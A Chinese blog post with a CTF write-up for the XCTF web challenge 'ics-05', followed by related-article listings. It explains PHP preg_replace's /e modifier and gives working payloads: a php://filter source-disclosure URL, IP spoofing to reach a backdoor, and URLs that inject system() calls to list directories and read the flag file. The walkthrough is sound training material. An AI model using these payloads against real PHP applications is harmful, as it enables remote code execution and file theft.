XCTF web ics-05

最新推荐文章于 2024-05-24 22:00:00 发布
最新推荐文章于 2024-05-24 22:00:00 发布
阅读量308 收藏 2
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42172261/article/details/100585990
版权

preg_replace() 函数执行一个正则表达式的搜索和替换。

mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )

搜索 subject 中匹配 pattern 的部分, 以 replacement 进行替换。

preg_replace()函数存在一个安全问题:
/e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换完之后)。
要确保 replacement 构成一个合法的 PHP 代码字符串,否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错误。
注意如果是在url中传参,需要把pattern加上//e.比如?pattern=/hello/e

进入云平台设备维护中心,点击那个图片出现index
观察url,有?page=index
用php伪协议,?page=php://filter/read=convert.base64-encode/resource=index.php查看是否有源码泄露
得到base64,解码后审计,在最后发现后门
伪造ip,127.0.0.1访问
然后注意到preg_replace函数,构造三个参数
注意第一个参数需要 //e
http://111.198.29.45:31944/index.php?pat=/just/e&rep=phpinfo()&sub=just可以查看php版本信息,这个方法可行
http://111.198.29.45:31944/index.php?pat=/just/e&rep=system(%22ls%22)&sub=just
http://111.198.29.45:31944/index.php?pat=/just/e&rep=system(%22cd%20s3chahahaDir;%20ls%22)&sub=just
http://111.198.29.45:31944/index.php?pat=/just/e&rep=system(%22cat%20s3chahahaDir/flag/flag.php%22)&sub=just
在源码的注释中看到flag。

H4ppyD0g
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【网络安全 | XCTF攻防世界 ics-05 解题详析
等风来
05-31 3665
题目描述:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统。在当前目录及其子目录中查找文件名中包含 xx 的文件,如。构造Payload如下,实现将sub中的。根据提示,进入维护中心页面。查看源代码 发现注入点。
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
【愚公系列】2023年05攻防世界-Webics-05
时光隧道
05-26 7770
preg_replace 函数是一个正则表达式替换函数,它可以在字符串中执行搜索和替换操作。其中,$pattern是一个正则表达式,是要替换的字符串或字符串数组,$subject是要搜索和替换的原始字符串。使用了不安全的正则表达式:有些正则表达式可能会导致漏洞。例如,使用未经转义的特殊字符,如反斜杠、圆括号和方括号等,可能导致语法错误或意外的行为。使用用户提供的数据作为正则表达式或替换字符串:如果不正确地处理用户提供的数据,攻击者可能会注入恶意代码,导致代码执行或任意文件读取。
攻防世界——ics-05
m0_62063669的博客
06-21 2232
攻防世界——ics-05,打开题目场景,进入设备维护中心,将所有可点击的地方都点了一遍,发现只有设备维护中心可以打开在源代码中发现page=index写入参数,参数会在页面中显示有参数的话,可以尝试以下XSS(没有任何反应,失败)LFI(Local File Inclusion) 本地文件包含漏洞,指的是能打开并包含本地文件的漏洞 LFI漏洞的黑盒判断方法:如果只从URL判断,URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键词,就可能存在文件包含漏洞。..
[XCTF_网络安全] 攻防世界 ics-05 解题详析
最新发布
qingkahui24689的博客
05-24 553
[XCTF_网络安全] 攻防世界 ics-05 解题详析,该题考察XFF及/e修正符的相关知识。
攻防世界-web-ics-05
wuh2333的博客
07-12 467
攻防世界ics,命令注入
攻防世界-ics-05-(详细操作)做题笔记
qq_43715020的博客
06-15 1533
攻防世界-ics-05-(详细操作)做题笔记
XCTF-HW-pipeline附件
11-09
附件
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
XCTF-2019-tfboys:XCTF 2019最终网络任务“ tfboys”的源代码
05-18
XCTF-2019-tfboys tfboys又名TensorFlow Boys 部署(Python3) pip install -r requirements.txt cd web3 python run.py 迪尔斯 web3/model/default/ : pre-trained LSTM model. exploit/exploit.ipynb : codes...
攻防世界web——ics05
manerzi的博客
10-24 873
攻防世界web——ics05
攻防世界ics-05
wangzhemvp的博客
04-05 643
提示:要确保 replacement 构成一个合法的 PHP 代码字符串,否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错误。使用 /e 修饰符,preg_replace 会将 replacement 参数当作 PHP 代码执行。php://filter 伪协议查看源码 + preg_replace 函数漏洞。1.获取网页源代码。多点点界面,发现点云平台设备维护中心时,页面发生变化。page=index 输入什么显示什么,有回显。用php://filter读取网页源代码。
XCTF-攻防世界CTF平台-Web类——17、ics-05(php://filter 协议、preg_replace函数命令执行)
Onlyone_1314的博客
01-01 2862
查看题目: 提示:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统,可能和后门程序有关,位置在工控云管理系统的设备维护中心 打开题目地址: 查看页面源代码: 只有设备维护中心的链接点击会跳转到index.php: 显示:数据接口请求异常 再查看index.php的源代码: 在云平台设备维护中心处有一个链接?page=index 点击之后: 它以GET方式提交page变量的值为index,后端index.php处理之后返回index。 传入page=123456,返回123456 所以我
攻防世界-web ics-05
m0_48108919的博客
02-19 2403
题目描述:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统 逐个点击菜单栏,发现只有设备维护中心有跳转 题目提示了利用后门入侵,首先使用dirsearch扫描网站目录,发现有个/index.php/login目录 尝试访问,发现页面有超链接,尝试点击 发现page的参数会原样输出 尝试使用php伪协议读取文件: php伪协议参考:https://www.cnblogs.com/endust/p/11804767.html 构造payload读取index.php..
攻防世界WEB】难度三星9分入门题(中):ics-05、easytornado
07-23 275
攻防世界WEB】三星9分
胡乱自学黑客的,能骂醒一个算一个
2401_84208172的博客
05-05 730
为啥说胡乱自学黑客的,能骂醒一个算一个。因为很多人学会个工具就觉得自己是黑客了,其实再真正的黑客眼里,你就是个脚本小子而已。首先我谈下对黑客&网络安全的认知,其实最重要的是兴趣热爱,不同于网络安全工程师,他们大都是培训机构培训出来的,具备的基本都是防御和白帽子技能,他们绝大多数的人看的是工资,他们是为了就业而学习,为了走捷径才去参加培训。
xctf攻防世界 Web高手进阶区 ics-05
l8947943的博客
08-09 7502
这个题目后面不难,最难的是一开始使用php伪协议,其次是php代码审计。这儿是知识盲区,慢慢积累吧。
攻防世界ics-05(PHP伪协议+代码审计+Linux指令)
2302_79800344的博客
04-08 1254
它表示在执行替换时将替换字符串作为 PHP 代码进行评估和执行。修饰符在 PHP 中已经被废弃。
web-ics-05
07-28
对于题目"web-ics-05",根据提供的引用内容,我们可以得到以下信息: - 这道题可能是在入侵后利用管理平台来完成一些信息的收集,读取文件并利用是非常重要的。\[1\] - 在源代码中有一段注释,提到要给HTTP头部添加X...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

H4ppyD0g

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值